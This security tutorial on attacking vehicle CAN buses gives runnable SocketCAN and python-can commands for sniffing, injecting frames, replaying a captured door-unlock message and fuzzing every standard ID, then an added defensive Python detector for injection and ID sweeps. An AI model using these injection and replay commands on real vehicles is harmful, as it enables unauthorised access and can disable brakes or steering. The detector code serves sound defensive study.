CAN Bus Attacks
Exploitation
CAN bus (Controller Area Network) has no authentication or encryption at the protocol level: any ECU on the bus can transmit any arbitration ID with any payload, and receivers have no way to tell a legitimate frame from an injected one. This guide covers sniffing, injection, and fuzzing attacks.
CAN Sniffing and Injection
```bash
# Set up the CAN interface (Linux with SocketCAN)
sudo ip link set can0 type can bitrate 500000
sudo ip link set up can0

# Sniff CAN traffic
candump can0

# Filter a specific CAN ID (filter syntax is ID:MASK)
candump can0,123:7FF   # Only show ID 0x123

# Send a CAN message
cansend can0 123#DEADBEEF

# Example: unlock doors (ID and data vary by vehicle)
# 1. Capture CAN traffic to a log file while pressing the unlock button
candump -l can0
# 2. Analyze the log for the unlock message
#    Look for a message that appears once when unlocking
# 3. Replay the message
cansend can0 456#01020304

# Fuzzing CAN IDs (all 11-bit standard IDs, 0x000-0x7FF)
for id in $(seq 0 2047); do
    cansend can0 $(printf "%03X#0000000000000000" $id)
    sleep 0.1
done

# Using python-can for scripting (quoted heredoc so the shell does not expand it)
python3 << 'EOF'
import can
bus = can.interface.Bus(channel='can0', bustype='socketcan')
# Send a message
msg = can.Message(arbitration_id=0x123, data=[0xDE, 0xAD, 0xBE, 0xEF], is_extended_id=False)
bus.send(msg)
# Sniff messages (blocks forever; Ctrl-C to stop)
for msg in bus:
    print(f"ID: {msg.arbitration_id:03X} Data: {msg.data.hex()}")
EOF
```
Testing on Live Vehicles
NEVER test CAN injection on moving vehicles. Injecting messages can disable brakes, steering,
or airbags. Always test with the vehicle on jack stands and use a kill switch for safety.
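From the defender's side, the capture-and-replay and ID-sweep workflows above leave recognisable traces in a `candump -l` log: a periodic ID that suddenly arrives well before its usual period (a second sender interleaving with the real ECU), IDs that never appear in known-good traffic, and a burst of many distinct never-seen IDs within a second. The following Python is an added example written for this page, not code from the original guide or from python-can. It parses the `candump -l` text format, learns a per-ID baseline from a known-good capture, and flags those three patterns. All log lines in it are constructed sample data, and the alert thresholds (`tol`, `sweep_ids`) are arbitrary choices that a real deployment would tune per vehicle.

```python
"""Offline anomaly checks over a candump -l capture (added example)."""
import re
from collections import defaultdict
from dataclasses import dataclass

# One candump -l line looks like: "(1700000000.123456) can0 123#DEADBEEF"
LOG_RE = re.compile(
    r"^\((?P<ts>\d+\.\d+)\)\s+(?P<iface>\S+)\s+"
    r"(?P<id>[0-9A-Fa-f]{3,8})#(?P<data>[0-9A-Fa-f]*)$"
)


@dataclass
class Frame:
    ts: float
    iface: str
    can_id: int
    data: bytes


def parse_candump(text):
    """Parse classic-CAN data frames from candump -l output; CAN FD ('##') and RTR lines are skipped."""
    frames = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if m:
            frames.append(Frame(float(m["ts"]), m["iface"],
                                int(m["id"], 16), bytes.fromhex(m["data"])))
    return frames


def learn_baseline(frames):
    """Known-good capture -> {can_id: median inter-arrival time, or None if seen once}."""
    times = defaultdict(list)
    for f in frames:
        times[f.can_id].append(f.ts)
    baseline = {}
    for can_id, ts in times.items():
        gaps = sorted(b - a for a, b in zip(ts, ts[1:]))
        baseline[can_id] = gaps[len(gaps) // 2] if gaps else None
    return baseline


def detect(frames, baseline, tol=0.5, sweep_ids=20):
    """Return (kind, ts, info) alerts of kinds unknown_id, early_frame and id_sweep."""
    alerts, last_seen = [], {}
    unknown_per_sec = defaultdict(set)  # whole second -> distinct unknown IDs seen in it
    for f in frames:
        if f.can_id not in baseline:
            alerts.append(("unknown_id", f.ts, f.can_id))
            unknown_per_sec[int(f.ts)].add(f.can_id)
            continue
        period, prev = baseline[f.can_id], last_seen.get(f.can_id)
        # A periodic ID arriving long before its period is due means a second
        # sender (injection or replay) is interleaving with the legitimate ECU.
        if period and prev is not None and f.ts - prev < period * tol:
            alerts.append(("early_frame", f.ts, f.can_id))
        last_seen[f.can_id] = f.ts
    for sec, ids in sorted(unknown_per_sec.items()):
        if len(ids) >= sweep_ids:  # many never-seen IDs inside one second: ID sweep
            alerts.append(("id_sweep", float(sec), len(ids)))
    return alerts


def periodic(can_id, period, start, count, data):
    """Constructed log lines for one periodic ECU message (sample data, not a real capture)."""
    return [f"({start + i * period:.6f}) can0 {can_id:03X}#{data}" for i in range(count)]


# Constructed baseline: two periodic IDs recorded while the vehicle sits idle.
BASELINE_LOG = "\n".join(periodic(0x123, 0.10, 1000.0, 11, "0000000000000000")
                         + periodic(0x2A0, 0.05, 1000.0, 21, "1122"))
# Constructed suspect capture: the same traffic plus one interleaved 0x123 frame,
# one never-seen ID, and a burst of 30 distinct unknown IDs (sweep pattern).
SUSPECT_LOG = "\n".join(
    periodic(0x123, 0.10, 1000.0, 11, "0000000000000000")
    + ["(1000.330000) can0 123#0000000000000001", "(1000.500000) can0 456#01020304"]
    + periodic(0x2A0, 0.05, 1000.0, 21, "1122")
    + [f"(1002.{i:02d}0000) can0 {0x600 + i:03X}#0000000000000000" for i in range(30)]
)


def run_demo():
    """Learn from BASELINE_LOG, then check the time-ordered SUSPECT_LOG against it."""
    frames = sorted(parse_candump(SUSPECT_LOG), key=lambda f: f.ts)
    return detect(frames, learn_baseline(parse_candump(BASELINE_LOG)))


if __name__ == "__main__":
    for kind, ts, info in run_demo():
        shown = info if kind == "id_sweep" else f"0x{info:03X}"
        print(f"{ts:.3f} {kind} {shown}")
```

The baseline is learned from timing alone, so it needs a capture taken under the same conditions (ignition state, bus speed) as the traffic being checked; event-driven IDs that fire only on a button press get a `None` period and are only ever checked for being present at all. Running the demo prints one `early_frame` for the interleaved 0x123 frame, `unknown_id` for 0x456 and each of the 30 swept IDs, and a single `id_sweep` for the burst.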